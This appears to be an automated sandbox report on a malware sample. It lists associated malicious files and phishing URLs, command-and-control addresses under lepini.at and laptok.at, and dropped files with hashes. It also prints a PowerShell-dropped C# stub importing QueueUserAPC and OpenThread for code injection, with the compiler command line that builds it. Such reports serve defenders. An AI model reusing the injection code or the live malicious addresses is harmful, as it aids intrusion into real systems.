c56.lepini.at	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	2200.dll	Get hash	malicious	Browse	47.241.19.44
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	47.241.19.44
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	47.241.19.44
	http://c56.lepini.at	Get hash	malicious	Browse	47.241.19.44
api3.lepini.at	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	2200.dll	Get hash	malicious	Browse	47.241.19.44
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	47.241.19.44
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	47.241.19.44
	0cJWsqWE2WRJ.vbs	Get hash	malicious	Browse	47.241.19.44
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	47.241.19.44
	9EJxhyQLyzPG.vbs	Get hash	malicious	Browse	47.241.19.44
	C4iOuBBkd5lq-beware-malware.vbs	Get hash	malicious	Browse	8.208.101.13
	PtgzM1Gd04Up.vbs	Get hash	malicious	Browse	8.208.101.13

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	https://bouncy-alpine-yam.glitch.me/#j.dutheil@dagimport.com	Get hash	malicious	Browse	47.254.218.25
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	https://bit.ly/35MTO80	Get hash	malicious	Browse	8.208.98.199
	videorepair_setup_full6715.exe	Get hash	malicious	Browse	47.91.67.36
	http://banchio.com/common/imgbrowser/update/index.php	Get hash	malicious	Browse	47.241.0.4
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	1119_673423.doc	Get hash	malicious	Browse	8.208.13.158
	1118_8732615.doc	Get hash	malicious	Browse	8.208.13.158
	https://bit.ly/36uHc4k	Get hash	malicious	Browse	8.208.98.199
	https://bit.ly/2UkQfiI	Get hash	malicious	Browse	8.208.98.199
	WeTransfer File for info@nanniottavio.it .html	Get hash	malicious	Browse	47.254.218.25
	https://bit.ly/2K1UcH2	Get hash	malicious	Browse	8.208.98.199
	http://sistaqui.com/wp-content/activatedg.php?utm_source=google&utm_medium=adwords&utm_campaign=dvid	Get hash	malicious	Browse	47.254.170.17
	https://bit.ly/32NFFFf	Get hash	malicious	Browse	8.208.98.199
	https://docs.google.com/document/d/e/2PACX-1vTXjxu9U09_RHRx1i-oO2TYLCb5Uztf2wHiVVFFHq8srDJ1oKiEfPRIO7_slB-VnNS_T_Q-hOHFxFWL/pub	Get hash	malicious	Browse	47.88.17.4
	https://bit.ly/2Itre2m	Get hash	malicious	Browse	8.208.98.199

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B24C39E1-2D7D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	70760
Entropy (8bit):	2.029915725001615
Encrypted:	false
SSDEEP:	192:rBZiZBI2BNl9WBNHwtBNHpNifBNHp0aMezMBNHQF0QGc6qqBBNUQF089ptBNUQwB:rH+VxU4Egjnqty6pE2IS
MD5:	2C9E17CA8FA3B14C85503A78AF5EFFB8
SHA1:	791AD768DB828A559616E24299C4BE3C41C7582C
SHA-256:	6628C6B7F11098030CEF04B561F1A4378C916B2C35EFEE8AD52327A4D43E485C
SHA-512:	629807748AC1C7DBC541EA4D9A0FA7D58D2810F5D0B4A2E91A8D18427ADE3D14AE0A1D4F62CA8263D58D94EFE1889D5F6B1919B74B78D254D0A6BA48AD4B625D
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B24C39E3-2D7D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27600
Entropy (8bit):	1.9201967726626565
Encrypted:	false
SSDEEP:	192:rBZXQT6xk7FjR92RIkWR0MRrY5D+FuOY1DPFuO9oA:rHA2i7hR0RMRhRrwDquO0D9uO5
MD5:	5A77C8785B4E875796A562A411C8C76C
SHA1:	6B483870B3D4B06DAA136B3342F289E450BBB59E
SHA-256:	849CFC21C226EEC73CE069D2D3F5F54539BBDBF022A4F587FBC0D221EFE7E135
SHA-512:	E1CDF33BC8916754C8EE323B863C90C29E971A7DD4AE6BCB604BEEBE6112DA2F564A4220090862CD62B3664FCAA607DEFD300D340D46EB9171F4D1E76DA45B21
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B24C39E5-2D7D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28172
Entropy (8bit):	1.929205872343585
Encrypted:	false
SSDEEP:	192:ryZOQa6Uk/Fj52QkWOMpYtmidFleid2uA:ruLF5/hIUnpkmofeo2J
MD5:	551529A636FC7AEDB6C5D04CE1D14C45
SHA1:	C1CA39149400D9D4FF7623B564D682BD20F5BA85
SHA-256:	C2965E36A51DE23F8F27E13DCFFC7D2BB85FE744FB263C237CF438961DB77F5D
SHA-512:	A61B7969E5131AB50BE48D710EA64BB80E742726CFBADD3E8F4DFA9706948200345E3D081A4E21902FE2D586C038FEDD705CDCE58ACA879564FED16822682FEB
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B9675AD6-2D7D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27728
Entropy (8bit):	1.9406359464322147
Encrypted:	false
SSDEEP:	192:r3ZcQf6hk6Fj524kWaMtY5TPtrYxG1TPXPtrYxf9A:rp1SS6hI8btwTGcTPGpu
MD5:	FA98A5F165973053EDE4F517DB598191
SHA1:	A8852B04837CBDA495CF390292237092CA83980A
SHA-256:	0D406930D2FBF5F26164FEE24EF8E18E33A0E8FF89557132778AEE38A2F077EC
SHA-512:	0B0CC4C6E606A5D93EFAB6C2BE54E8924B513E747EE9EDF01FCB2850C0855AB0D7879D18C84A29A818DABBDF8AEF94A057DAE8F8B2A965FE23CCDFA276926642
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\j[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	267692
Entropy (8bit):	5.9998318720132415
Encrypted:	false
SSDEEP:	6144:44O5Y0gENNNqfVNhLk80e90l74eSNzOKGDXlGkW:44OCGcfdLk2eZTozwD8
MD5:	A512480796AAC276DE075C8246DEBFAD
SHA1:	7ABAD97BA1DDE2DE12AE13D8B073DD62052DEBCB
SHA-256:	69F5D4AAF530E735560A17E4D9D448F3919FD2C2225A4D01ACD7F5314FC01A25
SHA-512:	8C2D88DBA729FBC2B3A25276DA1D39794CF87EA1477669FBC3F5FA6E2E77A1BEEFEEA2729E6FE21FF9377A9F0F57D1A9F9C4C1AA45B3F636F81B97EC81389D66
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j
Preview:	MXaT+k4mMtUL9eYPx2IlrpVm5upz2PvttLY1qPTY4E7P0iDWMDKUVrMLiWZRLRvv8fPCCk6Ab4dOGpRrKXx4Ox+lZsGcH+jO4f/CbnbUm2cmRY8W1BOz/uHPM/rJ8s4fjc9nWX/FmHC6pFi4dD1tx/NICJ35i3MPfBpSA4GY64F0Ur3KeEfrclI0BzeGwF3qA7fuEEV1m+kR0nqrlJm/BuUQeINp57klIcOxWWjV2ydNiRGATvFjJNuQhVgJfmqRRhcVhr9xngUX46tyJNRjZg8mgsm2m/4VqELy7yPhsqdPmlKQqjWNIAV8Irw8JMW+kVEQU3ydu6VcxfXll6Y6gcCm7PTQc2b9bjA2CDJIV5JhuN7gwUm9hjJOiexpiqjlpgqYgdJYuQ1s3Xxm9wFaH+QHK8Mdi+00b27kP95+ShYR5jGL7sI/es25tH74WYMMnUJcxMVKbiMdPJwpw8qXwFabtH3NRNY7zPxXhnaYzQYdSI7ousMyu87rR9HPZm6eOw9yzTW9qZlUNSZ11gAHiL8OibrLhAlnNzv85wNllktyqBSvPha3Mr+mIQlPGfNfpVVEAAQZzPZTRigtxJMTriCNHAI8anMKk9+jBYR48GNMTcA7jcUG3UkA8f1Ky/0fU4/E53kH8jjCss9FJe502wloYjbNRdxu6eia/0Mmg9uNi6UMD3uB4WHJqRqXuYIIdQhOa1pnOwSK6UiSsIMkT/aD2g1AoAjnbzFhdnn4y66JzdHsRG3lY03SwDpsxuddvjfg4eX0RVcXlJgvP6SNUnAVzzVtsSp3fKeX8r/O+0kIgjEOhoX9aHB0aS4uk2+lShYKR/LjHsZ46HdY3gu1BXC9XKdSDvf1sFERSKj4fxM6KwhtAWh9rgVrVZpFwAZBGTlXS5RQK7oWxPu0y4piw26SHKllj2TnMNiEDk3/v6cMtKz4bSo8e3RSVtnqrmcBCxak/8abhsddRrj4IStq2/bo1Fa6PLwpkP/iK13A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\Gfdfp[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2400
Entropy (8bit):	5.982959048236587
Encrypted:	false
SSDEEP:	48:BXb1tWWNj65eUdL8F8AvD/5skoHa3NBMO9YcQuOa/LEQd5W5Wu+8:ntWWF65ng9Dh0H8MO8lOzu+8
MD5:	29F9204F23026C595F6E2A549DB446C7
SHA1:	B81892FDF6C46415746B10D79B1099930D2BD2F5
SHA-256:	73F4F79CCED31F9B899FDCF1C2CAF1D66613538B1719A4E8A80DEEBB71D81206
SHA-512:	C008854797984179456066FF68CBFC8F732F510965D9B2069BC6CEF9DB99DD59EC908DAFC9889CD08B8357418982A3DD89983FA51585CDD24E5C2E4CC91E457A
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/KuF_2F7v1MfxGX_2FqHF/gE7HR_2BEW_2FETIZlo/3O7oOiSknl3ZdKUC6RNt6Z/TpA_2BZA44zII/bnPVc30i/qqGquE5ikDsN3lqsmRQUi6s/01UAcvdPS6/Y4vwKTH4z9SKX83Hk/GzPOGAYN_2Ba/uwZA847uRup/qUVRcsxtj_2B4M/Zg0BM4mqEN49EAfvZiK8m/hblONlnAdbx7_2FY/dksXSYXlnNujYzz/8J_2BxPtB78im5D1oF/b4ehtOJuT/4O2ZohnCHbAXcsKJP56g/k9_0A_0DMSUG1trlbpE/x9OMnUuruu3aGaoqe55RFv/8pmbW_2FjbM3S/_2FlfQQC/a7gxCYKdIB_2BmP/Gfdfp
Preview:	qnbw7POhhOvWjjjOoG705V/fzFquo/6TJPkGufCBViPPHYw55tv+iPpog1ePIaLT0HKsQB8qAmPZ0MiJADiJcRoWVwHAJQw0LkECJ0oaLCf/aZXECKxTkdXfDZueEqbOhezEKnTdfYj2L/LJDvzAZbctz2naqnFPj1IEkftRefEsvKdEuldhCABq1AGUflOp6MmTvCJaq4chtUC9Q8TwT7ahrqTh0MJ48eFyAdn7hXUVhNjz3C0ALJRqKJgziL82FBmBQeDLHLDczTAOUgOHM8sk41FtWMqc4NycQEME4fh+7oo53vtg225JXxDFV2hFe5veSIXDLS8Ke4ewsJfxNbAV8AFcH/tKKTFkrvHEuT7hYBHnHmRc7dg3GAAwzCaOEHNAau7mx0fFSJBNf1CFj+PB26dijy/iLHhBV+K6iKD8fpPCWHhb4eBNDNOn04K4zLsNBIxRv/SqM4ESXekTLMXpJtDEuEzVagnSfqktIiVMsuqa8qYAJOqZKg+gC0/6OF2Y8uupSAWDcScgIRf5E7UO1vkq6qClMabAHe/a85jh2O8ibFC3u6tcDL+aqTIBPEFTga8I+uY8CjCy7Go1zYp4hZ7y4OJ6DuPIWyVht6cmf0/NDsLuU39926u3AGjazazlwVotJNsIzccLPdi29U9K2ntBTR39EIqs6oI8XQmHKCknA8PmuvIVZtqobBE641+EHJ4VhoviofiY7UidXF778dMaV2Qc0pL3eQ68/yRL4o7jNzOVkEfvDBD6tB2I9pmK6EYcCbS79sLqmlUhqQJy8EozM1ehgYRv4wBq+/4kt5PY6+7LNXi7b0bCYiqss7CE9J6DaJSfyl3CvQqSUuaA0PZ5CnwQwcSTQoZii1ehbPX0XtZXUrrellZAKzpZGHdTH1yljq7sAn5ZquHKV9hDcJHgoOyHBomJwKwQaIO2hcfbsOiiQQnbnyU4zLYohcnvCwUMANUZFIIKs/Zhx4j3SI0ibvqzQAyzdDnH

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\k[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	338028
Entropy (8bit):	5.999918695533632
Encrypted:	false
SSDEEP:	6144:Zf73p9f6HTHAOHur1/xOZS83M6FWYbK9/gf14nNWiqSoEbMTozy5KlBuRTq:J3pegmy1pgxEYmBcmSSdbMM4RTq
MD5:	74C0FF61806856E0601DBEC941DA624D
SHA1:	85A8DDE4E0C6ACA4247B6F0321EB901DFB0C34AE
SHA-256:	3FE5D931BAEE5A2117E7AA9D0805F9F0DE486C29F4AC62280B86FC420B6B2E80
SHA-512:	D7A87C04BD103A4C7E5E4716C78B442BF7E5B0292A3D68A382D9E2887DA7D18E8733AC07E47D445FE82A5382D5AA96B71293FF8F7E5617513A64AB19A485F8EB
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/HCmdTF9ssS2xPQYmTqbko/QSaXs_2BFCMwb9WJ/TzYhMx5eXoG7h0c/n88BmwhZe9ijt5oT_2/Fx6667KDX/SidvZb9thKv8bvTE_2Bd/bd09MXr6sZJK_2B0qyS/ttipC86Fa_2BhWcPHgFDgb/FLKb2aUcMy7Ws/o6qiRO8c/nNeTK_2FSOWylkimJJN1ZPK/7CLWQhh7_2/FsBidPde1di4dmq_2/FoYbJ3dZ5_2F/jbxcTO3nXc9/SExxKRXHJLHHvI/_2BhbueQTaU2MuoAANkGM/Ms1_0A_0DsFCZtvF/RsiXqTx0w_2B7BA/8qwDi436YGxlKYNqBk/I9GfQ7ay9/1WHi9CeL/hOQKKrEqdJo6/k
Preview:	lm4aq8LsZ0CnjuSc7Kzqzdla3RDwkISvh5jIeC2xM5lIiA25vQGqGNFBAkO7XVxTu37lbn5TzqG8DYdBOuuW7FWsFpHJ96ctPhP/6QiItWVmSSWkmle3Bulr+d43yR0oqFk0LtY/Co2i+5RdlZHc9io/UaZllz1DnVUE9FpxBzj0azOjdJIvVxENnYdyqL6e8Mpu5SiTJvhRMcsX7zDgi4Cs/YsAa/oGKbobNc73ANj+Gw9RzAdgYr2/b+c6xAovnAoG8GV4gFwZaMc7SGZhcRrzj3eo/PPWc4Gqd8XUJk9OHO9ZhnEQ+MlD4vJMlpR6102FVBHvP0dBExvvzbDlXRj1bqQtl2yPCP5vMPKk6vNAkEqpDJM3VlO7a+rnTSmmg92EAZyu0+HCV3QW9z0tMNqG0ZYm4BKB4ZWbGOiCbpdvA1uZNfPp/Y8WP078mWtKzt+mV62A0K+b1s64nYJ3hEYWx8VFnf3bq5Auhfaxot2jlsdz81zti6vjRd5JUCdg/1aXqTG1CT5Df0qoAg9bicHSVkNFIOuQZoLfLQITbLcUVUZQ9bV4SDaTOm3pZvGFZwzObDgmByiFbFbZTAm1Gdu/DDm8g6J+Lt6Bz83sDKKiurg3fgFegiJWMuUwEoFPdbfOLCuuqNZC+02IDTYrX4+jEqZ6ov+AHbWoZBYYlBj5Qal/xaGe5vzFpCRNl9Hupyeuy+gM+3zLJITSk6HEMeVOOS1ZA2pLU+Gx6JcKiB/rqlhSu4KXU/EX3tf9kS8/UBy2ruoVttVF3IwMG4stVLe9qRFpzWyhq2mvdEFdsdZ+wMGx3yK7UPF6ZLE0/6H+nWd0ZgPHN9TFzKA0zZuW+//WQdBA1YX6si+t3sFJ5q6Z8QUUEuufs2JEPVZJjEUAvgBRiC9GmCxFVc/tXbnU3EjpoRVvm9QRvt+JjeZLgpTyztTDiXNHpyNa6aL2duvEESfeW4+TQz4kvOUSsgtR3VjI539sSOOcb42I7waP

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.8910535897909355
Encrypted:	false
SSDEEP:	192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
MD5:	7A57D8959BFD0B97B364F902ACD60F90
SHA1:	7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
SHA-256:	47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
SHA-512:	83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
Malicious:	false
Preview:	PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1192
Entropy (8bit):	5.325275554903011
Encrypted:	false
SSDEEP:	24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKaBPnKdi5:qEPerB4nqRL/HvFe9t4CvpBfui5
MD5:	C85C42A32E22DE29393FCCCCF3BBA96E
SHA1:	EAF3755C63061C96400536041D4F4EB8BC66E99E
SHA-256:	9022F6D5F92065B07E1C63F551EC66E19B13E067C179C65EF520BA10DA8AE42C
SHA-512:	7708F8C2F4A6B362E35CED939F87B1232F19E16F191A67E29A00E6BB3CDCE89299E9A8D7129C3DFBF39C2B0EBAF160A8455D520D5BFB9619E4CDA5CC9BDCF550
Malicious:	false
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\404E.bi1 Download File
Process:	C:\Windows\System32\nslookup.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	112
Entropy (8bit):	4.48992345445028
Encrypted:	false
SSDEEP:	3:cPLgeqnhARtt7TSjjhThARtn6an:o0eqnWbtChWbn6a
MD5:	1784914AE468F35A55BBAF2A8D746D04
SHA1:	7959C412D18BEBCE89AF9DC3715AA17A703467B1
SHA-256:	E32BFF5542AF45D88A381F1F0239906ACC07E086FD4F93D9A057A70D48DF4E1A
SHA-512:	CD36A88A3E8E5D11B606B65A72070FD1A60960ED7D4CC0713274039E328038FD129FC57DD806A8F66D2A82E9AF18304E7E39E494A75ECD3B40CA7EA6EE3D688C
Malicious:	false
Preview:	Server: resolver1.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 84.17.52.25....

C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	402
Entropy (8bit):	5.038590946267481
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJeMRSR7a1ehk1wJveJSSRa+rVSSRnA/fuHo8zy:V/DTLDfuC3jJWv9rV5nA/2IAy
MD5:	D318CFA6F0AA6A796C421A261F345F96
SHA1:	8CC7A3E861751CD586D810AB0747F9C909E7F051
SHA-256:	F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
SHA-512:	10EB4A6982093BE06F7B4C15F2898F0C7645ECD7EFA64195A9940778BCDE81CF54139B3A65A1584025948E87C37FAF699BE0B4EB5D6DFAEC41CDCC25E0E7BDA8
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tba. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr muapoay,IntPtr ownmggmyjwj,IntPtr blggfu);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uxd,uint egqs,IntPtr yobweqmfam);.. }..}.

C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.2685350696131525
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fwHiRwzxs7+AEszIwkn23fwHiR7GAn:p37Lvkmb6KRfYHiRwWZEifYHiR7x
MD5:	0B11F29185DB421C00903F45FE024AE2
SHA1:	DFF6A6F691D759E5F9B2235BDC4312CC813D126D
SHA-256:	A3B0D0B7F39D2C021C2075344B7AE6224CBB622B8EF23AF17EAE1AF6419ADC5A
SHA-512:	5290245920DB66BFBBE492764FD676D0478941635F478F5E662E239788DED63B0CCF360E1CCA2DAD0B7BBECD3F21C3540851F951671B2B62402A9C0E24EA4CED
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.0.cs"

C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6131948792968713
Encrypted:	false
SSDEEP:	24:etGSK/W2Dg85xL/XsB4z27L4zqhRqPPtkZfsFKfn+II+ycuZhN+/akSx4PNnq:6fWb5xL/OLbbuuJsFKPn1ulWa3Cq
MD5:	CDE35CA5287C4F9E965411C0392061FD
SHA1:	ADB2B06B3A662D8F7672F04CE1CCB53C14495DCC
SHA-256:	719B17E1FA8033BC84E9A4C24B4BB5D7FF2A6319CA17CE85B40BD9E1EEA785D8
SHA-512:	82EC4B2C1BB291EDF2F2EB87C0B8CD19A6AAE423FC3C0E1D7EE10B93C9B0B2024961763D8F2869F325183E1DC7006273295173C8AB908DF23D00EF9FCD97E2DE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....o.....{.....................a. ...a...!.a.%...a............3./.....6.......C.......V................................................<Module>.5b2bnkld.dll.tba.W32.mscorlib.Syst

C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1029347611044296
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryw/ak7Ynqqx4PN5Dlq5J:+RI+ycuZhN+/akSx4PNnqX
MD5:	37B56DB5457D9352C7F283016DF87B68
SHA1:	A200E669F621C0048D0C9D56DD9CF2F75B023662
SHA-256:	00CE7C8C5DECB076018E1F83D75BC20D60EB98D0F0BAFD79A39D0F1054FE70E2
SHA-512:	319CEA659A5835979F55F4F151B7011BAD3C247F111B01E19941DF4A7EDC65993DEE972FA7276B2D45CDF7CA086E5185D96F9FB350CAFD1C12537B115BCA0E24
Malicious:	false
